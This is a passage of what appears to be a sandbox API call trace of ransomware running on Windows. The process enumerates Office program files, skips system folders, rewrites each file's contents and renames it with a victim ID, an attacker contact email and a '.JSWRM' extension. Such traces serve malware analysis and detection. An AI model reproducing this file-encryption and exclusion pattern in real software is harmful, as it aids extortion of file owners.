lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0114.611] CloseHandle (hObject=0x238) returned 1 [0114.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0114.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0114.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0114.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0114.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0114.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.611] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\move.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MOVE.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\move.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0114.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0114.612] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3d4ec4f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3d4ec4f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3d4ec4f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3a60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MPXRES.DLL", cAlternateFileName="")) returned 1 [0114.612] lstrcmpiW (lpString1="MPXRES.DLL", lpString2=".") returned 1 [0114.612] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="..") returned 1 [0114.612] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="...") returned 1 [0114.612] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="windows") returned -1 [0114.612] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="recovery") returned -1 [0114.613] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="perflogs") returned -1 [0114.613] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="documents and settings") returned 1 [0114.613] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.613] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="system volume information") returned -1 [0114.613] lstrcmpiW (lpString1="MPXRES.DLL", lpString2="msocache") returned -1 [0114.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXRES.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXRES.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPXRES.DLL", lpUsedDefaultChar=0x0) returned 10 [0114.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0114.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXRES.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXRES.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPXRES.DLL", lpUsedDefaultChar=0x0) returned 10 [0114.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0114.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0114.613] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1de43d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4297c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSACCESS.HXS", cAlternateFileName="")) returned 1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2=".") returned 1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="..") returned 1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="...") returned 1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="windows") returned -1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="recovery") returned -1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="perflogs") returned -1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="documents and settings") returned 1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="system volume information") returned -1 [0114.613] lstrcmpiW (lpString1="MSACCESS.HXS", lpString2="msocache") returned -1 [0114.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.HXS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.HXS", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.HXS", lpUsedDefaultChar=0x0) returned 12 [0114.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0114.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.HXS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.HXS", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.HXS", lpUsedDefaultChar=0x0) returned 12 [0114.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0114.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0114.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0114.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0114.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.614] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=272764) returned 1 [0114.614] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0114.614] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0114.626] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.626] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0114.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.626] CloseHandle (hObject=0x238) returned 1 [0114.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0114.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0114.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0114.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.627] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0114.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0114.628] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b8364e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b8364e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSACCESS_COL.HXC", cAlternateFileName="MSACCE~1.HXC")) returned 1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2=".") returned 1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="..") returned 1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="...") returned 1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="windows") returned -1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="recovery") returned -1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="perflogs") returned -1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="documents and settings") returned 1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="system volume information") returned -1 [0114.628] lstrcmpiW (lpString1="MSACCESS_COL.HXC", lpString2="msocache") returned -1 [0114.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXC", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0114.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXC", cchWideChar=16, lpMultiByteStr=0x240f20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_COL.HXC", lpUsedDefaultChar=0x0) returned 16 [0114.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXC", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0114.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXC", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_COL.HXC", lpUsedDefaultChar=0x0) returned 16 [0114.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0114.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0114.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0114.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.629] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=646) returned 1 [0114.629] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0114.629] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0114.729] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.729] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0114.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.729] CloseHandle (hObject=0x238) returned 1 [0114.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0114.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0114.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0114.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0114.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0114.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0114.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.730] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0114.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0114.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0114.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0114.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0114.732] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b8364e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b8364e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSACCESS_COL.HXT", cAlternateFileName="MSACCE~1.HXT")) returned 1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2=".") returned 1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="..") returned 1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="...") returned 1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="windows") returned -1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="recovery") returned -1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="perflogs") returned -1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="documents and settings") returned 1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="system volume information") returned -1 [0114.732] lstrcmpiW (lpString1="MSACCESS_COL.HXT", lpString2="msocache") returned -1 [0114.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXT", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0114.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXT", cchWideChar=16, lpMultiByteStr=0x240f20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_COL.HXT", lpUsedDefaultChar=0x0) returned 16 [0114.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXT", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0114.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXT", cchWideChar=16, lpMultiByteStr=0x2412e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_COL.HXT", lpUsedDefaultChar=0x0) returned 16 [0114.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0114.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0114.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 